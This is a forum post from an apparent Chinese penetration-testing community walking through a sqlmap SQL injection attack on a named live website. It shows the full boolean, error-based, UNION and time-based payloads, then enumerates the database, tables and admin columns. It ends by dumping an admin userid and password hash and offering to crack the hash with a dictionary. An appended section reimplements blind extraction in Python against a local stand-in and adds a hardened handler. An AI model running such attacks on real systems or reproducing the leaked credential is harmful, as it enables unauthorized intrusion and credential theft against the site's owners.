中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: sqlmap worked example: injecting MySQL

Author: admin    Time: 2013-4-4 22:18
Title: sqlmap worked example: injecting MySQL
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the name of the current database user

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
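An added example, not part of the original post and not sqlmap's own code: the boolean-based blind technique that sqlmap lists first above (`id=276 AND 799=799` keeps the page, a false condition removes it) reimplemented in Python against a constructed in-process stand-in for `article.php`. The stand-in is backed by SQLite rather than MySQL, so the string functions are `length`, `substr` and `unicode` instead of MySQL's `LENGTH`, `SUBSTRING` and `ASCII`; the `article` and `admin` tables, the `demo_admin` row and its hash are made up, and all function names are mine. It also includes the hardened handler (strict integer validation plus a parameterized query) against which the same probes fail.

```python
import sqlite3

# Constructed stand-in for the target schema; not the real wepost database.
DEMO_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # md5("password"), a made-up admin credential


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE article(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO article VALUES (276, 'sample article');
        CREATE TABLE admin(id INTEGER, userid TEXT, password TEXT, type TEXT);
        INSERT INTO admin VALUES (1, 'demo_admin', '{DEMO_HASH}', 'super');
    """)
    return con


def article_vulnerable(con: sqlite3.Connection, id_param: str) -> bool:
    """The classic bug: the GET parameter is pasted into the SQL text.
    Returns True when the page would render an article (a row came back)."""
    sql = f"SELECT title FROM article WHERE id={id_param}"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:  # a broken query renders no article, same as a false condition
        return False


def article_hardened(con: sqlite3.Connection, id_param: str) -> bool:
    """Fix: reject anything that is not an integer, then bind it as a parameter."""
    try:
        article_id = int(id_param)
    except ValueError:
        return False
    row = con.execute("SELECT title FROM article WHERE id=?", (article_id,)).fetchone()
    return row is not None


class BlindOracle:
    """Wraps a handler as a yes/no oracle and counts probes, so the cost is visible."""

    def __init__(self, handler, con, base_id: str = "276"):
        self.handler, self.con, self.base_id = handler, con, base_id
        self.requests = 0

    def ask(self, condition: str) -> bool:
        self.requests += 1
        return self.handler(self.con, f"{self.base_id} AND ({condition})")


def confirm_injection(oracle: BlindOracle) -> bool:
    """sqlmap's own check: a true tautology keeps the page, a false one removes it."""
    return oracle.ask("799=799") and not oracle.ask("799=800")


def _search(oracle: BlindOracle, greater_than, lo: int, hi: int) -> int:
    """Binary search for a hidden integer v in [lo, hi] using only the
    predicate greater_than(n) -> SQL text meaning 'v > n'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(greater_than(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle: BlindOracle, expr: str, max_len: int = 64) -> str:
    """Extract the string value of a scalar SQL expression one character at a
    time. Assumes the value is printable ASCII (32..126) and at most max_len long."""
    length = _search(oracle, lambda n: f"length(({expr})) > {n}", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = _search(oracle, lambda c: f"unicode(substr(({expr}),{pos},1)) > {c}", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


def run_demo() -> dict:
    """Confirm the injection point, then pull the admin hash through it.
    The hardened handler never passes the confirmation step."""
    con = make_db()
    target = "(SELECT password FROM admin LIMIT 1)"
    vuln = BlindOracle(article_vulnerable, con)
    hardened = BlindOracle(article_hardened, con)
    result = {
        "vulnerable_confirmed": confirm_injection(vuln),
        "hardened_confirmed": confirm_injection(hardened),
    }
    if result["vulnerable_confirmed"]:
        result["extracted"] = blind_extract(vuln, target)
        result["requests"] = vuln.requests
    return result


if __name__ == "__main__":
    print(run_demo())
```

Each character costs about seven probes (a binary search over 95 printable codes), which is why sqlmap prefers the error-based and UNION techniques it also found here whenever they are available and falls back to boolean- or time-based blind only when they are not. The hardened handler fails the very first `799=799` probe because `int()` rejects the payload before any SQL is built; the bound `?` parameter is the second line of defence if validation is ever loosened.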




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2